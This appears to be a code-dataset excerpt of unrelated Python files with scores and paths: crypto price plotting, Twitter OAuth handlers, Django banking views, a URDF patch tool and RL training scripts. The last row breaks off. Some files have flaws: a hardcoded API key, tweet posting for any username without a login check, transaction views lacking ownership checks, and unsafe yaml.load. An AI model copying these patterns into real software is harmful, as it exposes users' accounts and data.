def _set_public_key(self, value):
self._public_key = text_type(value)
def _set_multi_factor(self, value):
self._mfa = value
def _get_private_key(self):
return self._private_key
def _get_public_key(self):
return self._public_key
def _get_mfa(self):
return self._mfa
def _increment_attempts(self):
self._attempts += 1
def get_package(self):
package = {
'PlaidCloud-Auth-Method': str(self.get_method()),
'PlaidCloud-Key': str(self._get_public_key()),
'PlaidCloud-Pass': str(self._get_private_key()),
'PlaidCloud-MFA': str(self._get_mfa()),
'PlaidCloud-Timestamp': str(utc.timestamp())
}
self._increment_attempts()
return package | 0.794624 | 0.075551 |
# In[4]:
import os
import numpy as np
import pickle
import quandl
import pandas as pd
import plotly.offline as py
import plotly.graph_objs as go
py.init_notebook_mode(connected=True)
# In[5]:
quandl.ApiConfig.api_key = 'tWWv7RoNKzyaxKKRnc8d'
# In[10]:
def get_quandl_data(quandl_code):
cache_path = '{}.pkl'.format(quandl_code).replace('/','-')
try:
f = open(cache_path,'rb')
df = pickle.load(f)
print('Loaded {} from cache'.format(quandl_code))
except (OSError,IOError) as e:
df=quandl.get(quandl_code,returns="pandas")
df.to_pickle(cache_path)
print('Cached {} at {}').format(quandl_code,cache_path)
return df
# In[11]:
btc_usd_kraken = get_quandl_data('BCHARTS/KRAKENUSD')
# In[12]:
btc_usd_kraken.head()
# In[13]:
btc_trace = go.Scatter(x=btc_usd_kraken.index,y=btc_usd_kraken['Weighted Price'])
py.iplot([btc_trace])
# In[18]:
exchanges = ['COINBASE','BITSTAMP','ITBIT']
exchange_data = {}
exchange_data['KRAKEN'] = btc_usd_kraken
for exchange in exchanges:
exchange_code = 'BCHARTS/{}USD'.format(exchange)
btc_exchange_df = get_quandl_data(exchange_code)
exchange_data[exchange] = btc_exchange_df
# In[19]:
exchange_data
# In[20]:
def merge_dfs(dataframes, labels,col):
series_dict = {}
for index in range(len(dataframes)):
series_dict[labels[index]] = dataframes[index][col]
return pd.DataFrame(series_dict)
# In[21]:
btc_usd_df = merge_dfs(list(exchange_data.values()),list(exchange_data.keys()), 'Weighted Price')
# In[22]:
btc_usd_df.head()
# In[29]:
layout = go.Layout(
title = 'Bitcoin Price By Exchange (USD)',
legend = {'orientation':'h'},
xaxis = {'type':'date'},
yaxis = {'title':'Price in USD'}
)
trace_arr = []
labels = list(btc_usd_df)
for index,label in enumerate(labels):
series = btc_usd_df[label]
trace = go.Scatter(x=series.index, y=series, name=label)
trace_arr.append(trace)
fig = go.Figure(data=trace_arr, layout=layout)
py.iplot(fig)
# In[30]:
btc_usd_df['avg_usd_price'] = btc_usd_df.mean(axis=1)
btc_trace = go.Scatter(x=btc_usd_df.index, y=btc_usd_df['avg_usd_price'])
py.iplot([btc_trace]) | Bitcoin Cryptocurrency Price Visualization.py |
# In[4]:
import os
import numpy as np
import pickle
import quandl
import pandas as pd
import plotly.offline as py
import plotly.graph_objs as go
py.init_notebook_mode(connected=True)
# In[5]:
quandl.ApiConfig.api_key = 'tWWv7RoNKzyaxKKRnc8d'
# In[10]:
def get_quandl_data(quandl_code):
cache_path = '{}.pkl'.format(quandl_code).replace('/','-')
try:
f = open(cache_path,'rb')
df = pickle.load(f)
print('Loaded {} from cache'.format(quandl_code))
except (OSError,IOError) as e:
df=quandl.get(quandl_code,returns="pandas")
df.to_pickle(cache_path)
print('Cached {} at {}').format(quandl_code,cache_path)
return df
# In[11]:
btc_usd_kraken = get_quandl_data('BCHARTS/KRAKENUSD')
# In[12]:
btc_usd_kraken.head()
# In[13]:
btc_trace = go.Scatter(x=btc_usd_kraken.index,y=btc_usd_kraken['Weighted Price'])
py.iplot([btc_trace])
# In[18]:
exchanges = ['COINBASE','BITSTAMP','ITBIT']
exchange_data = {}
exchange_data['KRAKEN'] = btc_usd_kraken
for exchange in exchanges:
exchange_code = 'BCHARTS/{}USD'.format(exchange)
btc_exchange_df = get_quandl_data(exchange_code)
exchange_data[exchange] = btc_exchange_df
# In[19]:
exchange_data
# In[20]:
def merge_dfs(dataframes, labels,col):
series_dict = {}
for index in range(len(dataframes)):
series_dict[labels[index]] = dataframes[index][col]
return pd.DataFrame(series_dict)
# In[21]:
btc_usd_df = merge_dfs(list(exchange_data.values()),list(exchange_data.keys()), 'Weighted Price')
# In[22]:
btc_usd_df.head()
# In[29]:
layout = go.Layout(
title = 'Bitcoin Price By Exchange (USD)',
legend = {'orientation':'h'},
xaxis = {'type':'date'},
yaxis = {'title':'Price in USD'}
)
trace_arr = []
labels = list(btc_usd_df)
for index,label in enumerate(labels):
series = btc_usd_df[label]
trace = go.Scatter(x=series.index, y=series, name=label)
trace_arr.append(trace)
fig = go.Figure(data=trace_arr, layout=layout)
py.iplot(fig)
# In[30]:
btc_usd_df['avg_usd_price'] = btc_usd_df.mean(axis=1)
btc_trace = go.Scatter(x=btc_usd_df.index, y=btc_usd_df['avg_usd_price'])
py.iplot([btc_trace]) | 0.392337 | 0.267617 |
import os
import fnmatch
import fileinput
import json
import re
import urllib.request
def getTestsCount():
testDir = "tests"
testFilePattern = r'test_a*.py'
count = 0
for file in fnmatch.filter(os.listdir(testDir), testFilePattern):
if file == 'test_a0000blank.py':
continue
testFile = os.path.join(testDir, file)
text = open(testFile, "r")
for line in text:
if re.match("def test_*", line):
count += 1
return count
def getSolutionsCount():
dirpath = "solutions"
pattern = r'a*.py'
solutions = [solution for solution in fnmatch.filter(os.listdir(dirpath), pattern) if solution != 'a0000blank.py']
return len(solutions)
def getAlgorithmsCount():
headers = {
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Content-Type': 'application/json',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1)'
' AppleWebKit/537.36 (KHTML, like Gecko)'
' Chrome/78.0.3904.97 Safari/537.366'
}
url = "https://leetcode.com/api/problems/algorithms/"
request = urllib.request.Request(url=url, headers=headers)
response = urllib.request.urlopen(request)
obj = json.loads(response.read().decode('utf-8'))
return obj['num_total']
def updateReadeMe(solutions, tests, total):
file = "README.md"
if total > 1000:
print("Progress: " + str(solutions) + " / " + str(total))
ratio = solutions / total
if ratio > 0.8:
color = 'success'
elif ratio > 0.5:
color = 'important'
else:
color = 'critical'
newStatus = 'Progress-' + str(solutions) + '%2F' + str(total) + '-' + color + '.svg'
testStatus = 'Tests-' + str(tests) + '-' + 'success.svg'
with fileinput.FileInput(file, inplace=True) as file:
for line in file:
line = re.sub(r"Progress\-\d+\%2F\d+\-.+\.svg", newStatus, line)
line = re.sub(r"Tests\-\d+\-.+\.svg", testStatus, line)
print(line, end='')
else:
print("FIXME: some error occurs!!!")
tests = getTestsCount()
solutions = getSolutionsCount()
total = getAlgorithmsCount()
updateReadeMe(solutions, tests, total) | progress.py |
import os
import fnmatch
import fileinput
import json
import re
import urllib.request
def getTestsCount():
testDir = "tests"
testFilePattern = r'test_a*.py'
count = 0
for file in fnmatch.filter(os.listdir(testDir), testFilePattern):
if file == 'test_a0000blank.py':
continue
testFile = os.path.join(testDir, file)
text = open(testFile, "r")
for line in text:
if re.match("def test_*", line):
count += 1
return count
def getSolutionsCount():
dirpath = "solutions"
pattern = r'a*.py'
solutions = [solution for solution in fnmatch.filter(os.listdir(dirpath), pattern) if solution != 'a0000blank.py']
return len(solutions)
def getAlgorithmsCount():
headers = {
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Content-Type': 'application/json',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1)'
' AppleWebKit/537.36 (KHTML, like Gecko)'
' Chrome/78.0.3904.97 Safari/537.366'
}
url = "https://leetcode.com/api/problems/algorithms/"
request = urllib.request.Request(url=url, headers=headers)
response = urllib.request.urlopen(request)
obj = json.loads(response.read().decode('utf-8'))
return obj['num_total']
def updateReadeMe(solutions, tests, total):
file = "README.md"
if total > 1000:
print("Progress: " + str(solutions) + " / " + str(total))
ratio = solutions / total
if ratio > 0.8:
color = 'success'
elif ratio > 0.5:
color = 'important'
else:
color = 'critical'
newStatus = 'Progress-' + str(solutions) + '%2F' + str(total) + '-' + color + '.svg'
testStatus = 'Tests-' + str(tests) + '-' + 'success.svg'
with fileinput.FileInput(file, inplace=True) as file:
for line in file:
line = re.sub(r"Progress\-\d+\%2F\d+\-.+\.svg", newStatus, line)
line = re.sub(r"Tests\-\d+\-.+\.svg", testStatus, line)
print(line, end='')
else:
print("FIXME: some error occurs!!!")
tests = getTestsCount()
solutions = getSolutionsCount()
total = getAlgorithmsCount()
updateReadeMe(solutions, tests, total) | 0.443118 | 0.113138 |
import uuid
from aiohttp import web
from aiohttp_session import get_session
from twython import Twython
from cursed.parrot import db
async def twitter_authorize(request):
app = request.app
auth = app['twitter'].get_authentication_tokens(
callback_url=app['settings']['twitter']['callback_url']
)
await db.create_user(
app,
{
'uuid': uuid.uuid4().hex,
'oauth_token': auth['oauth_token'],
'oauth_token_secret': auth['oauth_token_secret']
}
)
return web.HTTPFound(
location=auth['auth_url']
)
async def twitter_callback(request):
app = request.app
oauth_token = request.query['oauth_token']
oauth_verifier = request.query['oauth_verifier']
user = await db.get_user_by_token(app, oauth_token)
twitter = Twython(
**app['settings']['twitter']['tokens'],
oauth_token=oauth_token, oauth_token_secret=user.oauth_token_secret
)
final_step = twitter.get_authorized_tokens(oauth_verifier)
twitter = Twython(
**app['settings']['twitter']['tokens'],
oauth_token=final_step['oauth_token'],
oauth_token_secret=final_step['oauth_token_secret']
)
profile = twitter.verify_credentials()
user = await db.get_user(app, profile['screen_name'])
if not user:
user = await db.update_user(
app,
oauth_token,
{
'oauth_token': final_step['oauth_token'],
'oauth_token_secret': final_step['oauth_token_secret'],
'fullname': profile['name'],
'username': profile['screen_name']
}
)
session = await get_session(request)
session['username'] = profile['screen_name']
return web.HTTPFound(
location=app.router['home'].url_for()
)
async def twitter_update(request):
app = request.app
status = request.query['status']
username = request.query['username']
user = await db.get_user(app, username)
if user:
twitter = Twython(
**app['settings']['twitter']['tokens'],
oauth_token=user.oauth_token,
oauth_token_secret=user.oauth_token_secret
)
twitter.update_status(status=status)
return web.Response(text='Stay!') | src/cursed/parrot/twitter.py | import uuid
from aiohttp import web
from aiohttp_session import get_session
from twython import Twython
from cursed.parrot import db
async def twitter_authorize(request):
app = request.app
auth = app['twitter'].get_authentication_tokens(
callback_url=app['settings']['twitter']['callback_url']
)
await db.create_user(
app,
{
'uuid': uuid.uuid4().hex,
'oauth_token': auth['oauth_token'],
'oauth_token_secret': auth['oauth_token_secret']
}
)
return web.HTTPFound(
location=auth['auth_url']
)
async def twitter_callback(request):
app = request.app
oauth_token = request.query['oauth_token']
oauth_verifier = request.query['oauth_verifier']
user = await db.get_user_by_token(app, oauth_token)
twitter = Twython(
**app['settings']['twitter']['tokens'],
oauth_token=oauth_token, oauth_token_secret=user.oauth_token_secret
)
final_step = twitter.get_authorized_tokens(oauth_verifier)
twitter = Twython(
**app['settings']['twitter']['tokens'],
oauth_token=final_step['oauth_token'],
oauth_token_secret=final_step['oauth_token_secret']
)
profile = twitter.verify_credentials()
user = await db.get_user(app, profile['screen_name'])
if not user:
user = await db.update_user(
app,
oauth_token,
{
'oauth_token': final_step['oauth_token'],
'oauth_token_secret': final_step['oauth_token_secret'],
'fullname': profile['name'],
'username': profile['screen_name']
}
)
session = await get_session(request)
session['username'] = profile['screen_name']
return web.HTTPFound(
location=app.router['home'].url_for()
)
async def twitter_update(request):
app = request.app
status = request.query['status']
username = request.query['username']
user = await db.get_user(app, username)
if user:
twitter = Twython(
**app['settings']['twitter']['tokens'],
oauth_token=user.oauth_token,
oauth_token_secret=user.oauth_token_secret
)
twitter.update_status(status=status)
return web.Response(text='Stay!') | 0.264263 | 0.047404 |
from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404, redirect, render
from django.contrib.auth.models import User
from django.views import View
from .models import BankAccount, Transaction
from .forms import BankAccountForm, RegistrationForm, TransactionForm
from django.core.paginator import Paginator
from django.db.models import Q
from django.contrib.auth import authenticate, login
from django.contrib.auth.decorators import login_required
# Create your views here.
class LoginView(View):
def post(self, request):
username = request.POST["username"]
password = request.POST["password"]
user = authenticate(request, username=username, password=password)
if user is not None and user.is_staff:
login(request, user)
return HttpResponseRedirect("/admin")
if user is not None and not user.is_staff:
login(request, user)
return HttpResponseRedirect("/")
return render(request, "bank_account/login.html")
def get(self, request):
return render(request, "bank_account/login.html")
def user_create(request):
registration_form = RegistrationForm(request.POST)
if request.method == "POST":
if registration_form.is_valid():
username = registration_form.cleaned_data["username"]
password = registration_form.cleaned_data["password"]
first_name = registration_form.cleaned_data["first_name"]
last_name = registration_form.cleaned_data["last_name"]
email = registration_form.cleaned_data["email"]
user = User.objects.create_user(username, email, password)
user.first_name = first_name
user.last_name = last_name
user.password2 = password
user.save()
return redirect("list_bank_accounts")
else:
registration_form = RegistrationForm()
return render(
request,
"bank_account/registration.html",
{
"registration_form": registration_form,
},
)
@login_required
def list_users(request):
queryset = User.objects.all().order_by("-id")
if not request.user.is_anonymous:
queryset = queryset.exclude(username=request.user.username)
if request.GET.get("search_term"):
search_term = request.GET.get("search_term")
queryset = queryset.filter(
Q(username__icontains=search_term)
| Q(email__icontains=search_term)
| Q(first_name__icontains=search_term)
| Q(last_name__icontains=search_term)
)
paginator = Paginator(queryset, 10)
page_number = request.GET.get("page")
page_obj = paginator.get_page(page_number)
context = {
"users": page_obj,
}
return render(request, "bank_account/users.html", context)
@login_required
def make_transaction(request, pk):
bank_account = get_object_or_404(BankAccount, pk=pk)
current_user = request.user if not request.user.is_anonymous else None
form = TransactionForm(data=request.POST, user=current_user)
if request.method == "POST":
if form.is_valid():
transaction = form.save(commit=False)
transaction.sender = current_user
transaction.recipient = bank_account.owner
transaction.amount = form.cleaned_data["amount"]
transaction.recipient_bank_account = bank_account
if transaction.amount:
bank_account.amount += transaction.amount
bank_account.save()
subtracted_amount = (
transaction.amount / form.cleaned_data["bank_account"].count()
)
for account in form.cleaned_data["bank_account"]:
account.amount -= subtracted_amount
account.save()
transaction.save()
form.save_m2m()
return redirect("list_bank_accounts")
return render(request, "bank_account/transaction_form.html", {"form": form})
@login_required
def cancel_transaction(request, pk):
transaction = get_object_or_404(Transaction, pk=pk)
returned_amount = transaction.amount / transaction.bank_account.all().count()
for bank_account in transaction.bank_account.all():
bank_account.amount += returned_amount
bank_account.save()
if transaction.recipient_bank_account:
transaction.recipient_bank_account.amount -= transaction.amount
transaction.recipient_bank_account.save()
transaction.status = False
transaction.amount -= transaction.amount
transaction.save()
return redirect("list_transaction")
@login_required
def list_transactions(request):
queryset = Transaction.objects.all().order_by("created_at")
if not request.user.is_anonymous:
queryset = queryset.filter(sender=request.user)
if request.GET.get("start_date"):
queryset = queryset.filter(created_at__gte=request.GET.get("start_date"))
if request.GET.get("end_date"):
queryset = queryset.filter(created_at__lte=request.GET.get("end_date"))
if request.GET.get("start_date") and request.GET.get("end_date"):
queryset = queryset.filter(
created_at__gte=request.GET.get("start_date"),
created_at__lte=request.GET.get("end_date"),
)
if request.GET.get("amount"):
queryset = queryset.filter(amount__icontains=request.GET.get("amount"))
if request.GET.get("search_term"):
search_term = request.GET.get("search_term")
queryset = queryset.filter(
Q(sender__username__icontains=search_term)
| Q(recipient__username__icontains=search_term)
| Q(bank_account__id__icontains=search_term)
)
paginator = Paginator(queryset, 10)
page_number = request.GET.get("page")
page_obj = paginator.get_page(page_number)
return render(
request, "bank_account/transactions_list.html", {"page_obj": page_obj}
)
@login_required
def transaction_detail(request, pk):
transaction = get_object_or_404(Transaction, pk=pk)
context = {"transaction": transaction}
return render(request, "bank_account/transaction_detail.html", context)
@login_required
def list_bank_accounts(request):
current_user = request.user if not request.user.is_anonymous else None
queryset = BankAccount.objects.filter(owner=current_user)
context = {"bank_accounts": queryset}
return render(request, "bank_account/bank_accounts.html", context)
@login_required
def create_bank_account(request):
form = BankAccountForm(request.POST)
if request.method == "POST":
if form.is_valid():
bank_account = form.save(commit=False)
bank_account.owner = request.user
bank_account.amount = form.cleaned_data["amount"]
bank_account.save()
return redirect("list_users")
else:
form = BankAccountForm()
return render(request, "bank_account/create_bank_account.html", {"form": form})
@login_required
def bank_account_detail(request, pk):
queryset = get_object_or_404(BankAccount, pk=pk)
context = {"bank_account": queryset}
return render(request, "bank_account/bank_account_detail.html", context) | bank_account_app/bank_account/views.py | from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404, redirect, render
from django.contrib.auth.models import User
from django.views import View
from .models import BankAccount, Transaction
from .forms import BankAccountForm, RegistrationForm, TransactionForm
from django.core.paginator import Paginator
from django.db.models import Q
from django.contrib.auth import authenticate, login
from django.contrib.auth.decorators import login_required
# Create your views here.
class LoginView(View):
def post(self, request):
username = request.POST["username"]
password = request.POST["password"]
user = authenticate(request, username=username, password=password)
if user is not None and user.is_staff:
login(request, user)
return HttpResponseRedirect("/admin")
if user is not None and not user.is_staff:
login(request, user)
return HttpResponseRedirect("/")
return render(request, "bank_account/login.html")
def get(self, request):
return render(request, "bank_account/login.html")
def user_create(request):
registration_form = RegistrationForm(request.POST)
if request.method == "POST":
if registration_form.is_valid():
username = registration_form.cleaned_data["username"]
password = registration_form.cleaned_data["password"]
first_name = registration_form.cleaned_data["first_name"]
last_name = registration_form.cleaned_data["last_name"]
email = registration_form.cleaned_data["email"]
user = User.objects.create_user(username, email, password)
user.first_name = first_name
user.last_name = last_name
user.password2 = password
user.save()
return redirect("list_bank_accounts")
else:
registration_form = RegistrationForm()
return render(
request,
"bank_account/registration.html",
{
"registration_form": registration_form,
},
)
@login_required
def list_users(request):
queryset = User.objects.all().order_by("-id")
if not request.user.is_anonymous:
queryset = queryset.exclude(username=request.user.username)
if request.GET.get("search_term"):
search_term = request.GET.get("search_term")
queryset = queryset.filter(
Q(username__icontains=search_term)
| Q(email__icontains=search_term)
| Q(first_name__icontains=search_term)
| Q(last_name__icontains=search_term)
)
paginator = Paginator(queryset, 10)
page_number = request.GET.get("page")
page_obj = paginator.get_page(page_number)
context = {
"users": page_obj,
}
return render(request, "bank_account/users.html", context)
@login_required
def make_transaction(request, pk):
bank_account = get_object_or_404(BankAccount, pk=pk)
current_user = request.user if not request.user.is_anonymous else None
form = TransactionForm(data=request.POST, user=current_user)
if request.method == "POST":
if form.is_valid():
transaction = form.save(commit=False)
transaction.sender = current_user
transaction.recipient = bank_account.owner
transaction.amount = form.cleaned_data["amount"]
transaction.recipient_bank_account = bank_account
if transaction.amount:
bank_account.amount += transaction.amount
bank_account.save()
subtracted_amount = (
transaction.amount / form.cleaned_data["bank_account"].count()
)
for account in form.cleaned_data["bank_account"]:
account.amount -= subtracted_amount
account.save()
transaction.save()
form.save_m2m()
return redirect("list_bank_accounts")
return render(request, "bank_account/transaction_form.html", {"form": form})
@login_required
def cancel_transaction(request, pk):
transaction = get_object_or_404(Transaction, pk=pk)
returned_amount = transaction.amount / transaction.bank_account.all().count()
for bank_account in transaction.bank_account.all():
bank_account.amount += returned_amount
bank_account.save()
if transaction.recipient_bank_account:
transaction.recipient_bank_account.amount -= transaction.amount
transaction.recipient_bank_account.save()
transaction.status = False
transaction.amount -= transaction.amount
transaction.save()
return redirect("list_transaction")
@login_required
def list_transactions(request):
queryset = Transaction.objects.all().order_by("created_at")
if not request.user.is_anonymous:
queryset = queryset.filter(sender=request.user)
if request.GET.get("start_date"):
queryset = queryset.filter(created_at__gte=request.GET.get("start_date"))
if request.GET.get("end_date"):
queryset = queryset.filter(created_at__lte=request.GET.get("end_date"))
if request.GET.get("start_date") and request.GET.get("end_date"):
queryset = queryset.filter(
created_at__gte=request.GET.get("start_date"),
created_at__lte=request.GET.get("end_date"),
)
if request.GET.get("amount"):
queryset = queryset.filter(amount__icontains=request.GET.get("amount"))
if request.GET.get("search_term"):
search_term = request.GET.get("search_term")
queryset = queryset.filter(
Q(sender__username__icontains=search_term)
| Q(recipient__username__icontains=search_term)
| Q(bank_account__id__icontains=search_term)
)
paginator = Paginator(queryset, 10)
page_number = request.GET.get("page")
page_obj = paginator.get_page(page_number)
return render(
request, "bank_account/transactions_list.html", {"page_obj": page_obj}
)
@login_required
def transaction_detail(request, pk):
transaction = get_object_or_404(Transaction, pk=pk)
context = {"transaction": transaction}
return render(request, "bank_account/transaction_detail.html", context)
@login_required
def list_bank_accounts(request):
current_user = request.user if not request.user.is_anonymous else None
queryset = BankAccount.objects.filter(owner=current_user)
context = {"bank_accounts": queryset}
return render(request, "bank_account/bank_accounts.html", context)
@login_required
def create_bank_account(request):
form = BankAccountForm(request.POST)
if request.method == "POST":
if form.is_valid():
bank_account = form.save(commit=False)
bank_account.owner = request.user
bank_account.amount = form.cleaned_data["amount"]
bank_account.save()
return redirect("list_users")
else:
form = BankAccountForm()
return render(request, "bank_account/create_bank_account.html", {"form": form})
@login_required
def bank_account_detail(request, pk):
queryset = get_object_or_404(BankAccount, pk=pk)
context = {"bank_account": queryset}
return render(request, "bank_account/bank_account_detail.html", context) | 0.434221 | 0.076511 |
import argparse
from urdf_parser_py.urdf import URDF
import yaml
import sys
def findJointByName(robot, name):
for j in robot.joints:
if j.name == name:
return j
return None
def jointDiff(original, new):
"""
only take origin into account
"""
if hasattr(original, "origin") and hasattr(original.origin, "xyz"):
pos_original = original.origin.xyz or [0, 0, 0]
else:
pos_original = [0, 0, 0]
if hasattr(original, "origin") and hasattr(original.origin, "rpy"):
rpy_original = original.origin.rpy or [0, 0, 0]
else:
rpy_original = [0, 0, 0]
pos_new = new.origin.xyz or [0, 0, 0]
rpy_new = new.origin.rpy or [0, 0, 0]
if (pos_original[0] == pos_new[0] and
pos_original[1] == pos_new[1] and
pos_original[2] == pos_new[2]):
pos_diff = None
else:
print("old: ", pos_original)
print("new: ", pos_new)
pos_diff = pos_new
if (rpy_original[0] == rpy_new[0] and
rpy_original[1] == rpy_new[1] and
rpy_original[2] == rpy_new[2]):
rpy_diff = None
else:
print("old: ", rpy_original)
print("new: ", rpy_new)
rpy_diff = rpy_new
if not pos_diff and not rpy_diff:
return None
elif pos_diff and rpy_diff:
return {"xyz": pos_diff, "rpy": rpy_diff}
elif pos_diff:
return {"xyz": pos_diff}
elif rpy_diff:
return {"rpy": rpy_diff}
return None
def runDiff(original_file, new_file, output_file):
original_robot = URDF.from_xml_file(original_file)
new_robot = URDF.from_xml_file(new_file)
# only joint and link are considered
diffs = dict()
for j in original_robot.joints:
new_j = findJointByName(new_robot, j.name)
# check origin difference
if new_j:
diff = jointDiff(j, new_j)
if diff:
diffs[j.name] = diff
with open(output_file, "w") as f:
f.write(yaml.dump(diffs))
print(yaml.dump(diffs))
def runPatch(input_file, patch_yaml, output_file):
input_robot = URDF.from_xml_file(input_file)
patch_param = yaml.load(open(patch_yaml))
for joint_name in patch_param.keys():
diff = patch_param[joint_name]
if "xyz" in diff:
j = input_robot.joint_map[joint_name]
j.origin.xyz = diff["xyz"]
if "rpy" in diff:
j = input_robot.joint_map[joint_name]
j.origin.rpy = diff["rpy"]
if output_file:
with open(output_file, "w") as f:
f.write(input_robot.to_xml_string())
else:
print(input_robot.to_xml_string())
def parser():
p = argparse.ArgumentParser(description="Get and apply urdf patch")
p.add_argument("mode", help="diff or patch")
p.add_argument("arg0", help="""If mode is diff, specify original urdf.
If mode is patch, specify original urdf.""")
p.add_argument("arg1", help="""If mode is diff, specify new urdf.
If mode is patch, specify patch yaml file.
""")
p.add_argument("output", help="output file. You can omit this argument in diff mode and in that case the new urdf is output in STDOUT.", nargs="?")
return p
if __name__ == "__main__":
p = parser()
args = p.parse_args()
if args.mode == "diff":
if not args.output:
p.print_help()
sys.exit(1)
runDiff(args.arg0, args.arg1, args.output)
elif args.mode == "patch":
runPatch(args.arg0, args.arg1, args.output)
else:
raise Exception("unknown mode %s" % (args.mode)) | euscollada/scripts/urdf_patch.py | import argparse
from urdf_parser_py.urdf import URDF
import yaml
import sys
def findJointByName(robot, name):
for j in robot.joints:
if j.name == name:
return j
return None
def jointDiff(original, new):
"""
only take origin into account
"""
if hasattr(original, "origin") and hasattr(original.origin, "xyz"):
pos_original = original.origin.xyz or [0, 0, 0]
else:
pos_original = [0, 0, 0]
if hasattr(original, "origin") and hasattr(original.origin, "rpy"):
rpy_original = original.origin.rpy or [0, 0, 0]
else:
rpy_original = [0, 0, 0]
pos_new = new.origin.xyz or [0, 0, 0]
rpy_new = new.origin.rpy or [0, 0, 0]
if (pos_original[0] == pos_new[0] and
pos_original[1] == pos_new[1] and
pos_original[2] == pos_new[2]):
pos_diff = None
else:
print("old: ", pos_original)
print("new: ", pos_new)
pos_diff = pos_new
if (rpy_original[0] == rpy_new[0] and
rpy_original[1] == rpy_new[1] and
rpy_original[2] == rpy_new[2]):
rpy_diff = None
else:
print("old: ", rpy_original)
print("new: ", rpy_new)
rpy_diff = rpy_new
if not pos_diff and not rpy_diff:
return None
elif pos_diff and rpy_diff:
return {"xyz": pos_diff, "rpy": rpy_diff}
elif pos_diff:
return {"xyz": pos_diff}
elif rpy_diff:
return {"rpy": rpy_diff}
return None
def runDiff(original_file, new_file, output_file):
original_robot = URDF.from_xml_file(original_file)
new_robot = URDF.from_xml_file(new_file)
# only joint and link are considered
diffs = dict()
for j in original_robot.joints:
new_j = findJointByName(new_robot, j.name)
# check origin difference
if new_j:
diff = jointDiff(j, new_j)
if diff:
diffs[j.name] = diff
with open(output_file, "w") as f:
f.write(yaml.dump(diffs))
print(yaml.dump(diffs))
def runPatch(input_file, patch_yaml, output_file):
input_robot = URDF.from_xml_file(input_file)
patch_param = yaml.load(open(patch_yaml))
for joint_name in patch_param.keys():
diff = patch_param[joint_name]
if "xyz" in diff:
j = input_robot.joint_map[joint_name]
j.origin.xyz = diff["xyz"]
if "rpy" in diff:
j = input_robot.joint_map[joint_name]
j.origin.rpy = diff["rpy"]
if output_file:
with open(output_file, "w") as f:
f.write(input_robot.to_xml_string())
else:
print(input_robot.to_xml_string())
def parser():
p = argparse.ArgumentParser(description="Get and apply urdf patch")
p.add_argument("mode", help="diff or patch")
p.add_argument("arg0", help="""If mode is diff, specify original urdf.
If mode is patch, specify original urdf.""")
p.add_argument("arg1", help="""If mode is diff, specify new urdf.
If mode is patch, specify patch yaml file.
""")
p.add_argument("output", help="output file. You can omit this argument in diff mode and in that case the new urdf is output in STDOUT.", nargs="?")
return p
if __name__ == "__main__":
p = parser()
args = p.parse_args()
if args.mode == "diff":
if not args.output:
p.print_help()
sys.exit(1)
runDiff(args.arg0, args.arg1, args.output)
elif args.mode == "patch":
runPatch(args.arg0, args.arg1, args.output)
else:
raise Exception("unknown mode %s" % (args.mode)) | 0.26588 | 0.395659 |
from policies import TabularPolicy, DQNPolicy, IntentionPolicy, IntentionAblatedPolicy
from tabular_class import QTabularRLModel, MCTabularRLModel
from deep_class import DQNModel, IntentionModel, IntentionAblatedModel
import argparse
import numpy as np
import gym
from wrappers import DiscretizedObservationWrapper, TaxiObservationWrapper
parser = argparse.ArgumentParser()
parser.add_argument("--policy", type=str, help="Policy to train. One of [MC/Q/DQN].")
parser.add_argument("--load", type=str, help="Path to model to load.")
parser.add_argument("--ckpt", type=str, help="Path to model checkpoint.")
parser.add_argument("--seed", type=int, help="Random seed.")
parser.add_argument("--train", action="store_true", help="Training mode.")
args = parser.parse_args()
env = gym.make('Taxi-v3')
if args.policy in ["MC", "Q"]:
if args.policy == 'Q':
model = QTabularRLModel(
policy=TabularPolicy,
env=env,
learning_rate=0.1,
gamma=1.,
exploration_type="linear",
exploration_frac=0.999,
exploration_initial_eps=1.,
exploration_final_eps=0.05,
seed=args.seed,
intent=True)
if args.policy == 'MC':
model = MCTabularRLModel(
policy=TabularPolicy,
env=env,
learning_rate=0.1,
gamma=1.,
exploration_type="linear",
exploration_frac=0.999,
exploration_initial_eps=1.,
exploration_final_eps=0.05,
seed=args.seed,
intent=True)
if args.policy == 'DQN':
env = TaxiObservationWrapper(env)
model = IntentionAblatedModel(
policy=IntentionAblatedPolicy,
env=env,
learning_rate=0.0001,
gamma=1.,
buffer_size=10000,
exploration_type="linear",
exploration_frac=0.999,
exploration_initial_eps=1.,
exploration_final_eps=0.05,
seed=args.seed)
model.set_random_seed(args.seed)
if args.load:
model.load(args.load)
if args.train:
model.learn(total_episodes=5000, ckpt_interval=100, ckpt_path=args.ckpt) | train_taxi.py | from policies import TabularPolicy, DQNPolicy, IntentionPolicy, IntentionAblatedPolicy
from tabular_class import QTabularRLModel, MCTabularRLModel
from deep_class import DQNModel, IntentionModel, IntentionAblatedModel
import argparse
import numpy as np
import gym
from wrappers import DiscretizedObservationWrapper, TaxiObservationWrapper
parser = argparse.ArgumentParser()
parser.add_argument("--policy", type=str, help="Policy to train. One of [MC/Q/DQN].")
parser.add_argument("--load", type=str, help="Path to model to load.")
parser.add_argument("--ckpt", type=str, help="Path to model checkpoint.")
parser.add_argument("--seed", type=int, help="Random seed.")
parser.add_argument("--train", action="store_true", help="Training mode.")
args = parser.parse_args()
env = gym.make('Taxi-v3')
if args.policy in ["MC", "Q"]:
if args.policy == 'Q':
model = QTabularRLModel(
policy=TabularPolicy,
env=env,
learning_rate=0.1,
gamma=1.,
exploration_type="linear",
exploration_frac=0.999,
exploration_initial_eps=1.,
exploration_final_eps=0.05,
seed=args.seed,
intent=True)
if args.policy == 'MC':
model = MCTabularRLModel(
policy=TabularPolicy,
env=env,
learning_rate=0.1,
gamma=1.,
exploration_type="linear",
exploration_frac=0.999,
exploration_initial_eps=1.,
exploration_final_eps=0.05,
seed=args.seed,
intent=True)
if args.policy == 'DQN':
env = TaxiObservationWrapper(env)
model = IntentionAblatedModel(
policy=IntentionAblatedPolicy,
env=env,
learning_rate=0.0001,
gamma=1.,
buffer_size=10000,
exploration_type="linear",
exploration_frac=0.999,
exploration_initial_eps=1.,
exploration_final_eps=0.05,
seed=args.seed)
model.set_random_seed(args.seed)
if args.load:
model.load(args.load)
if args.train:
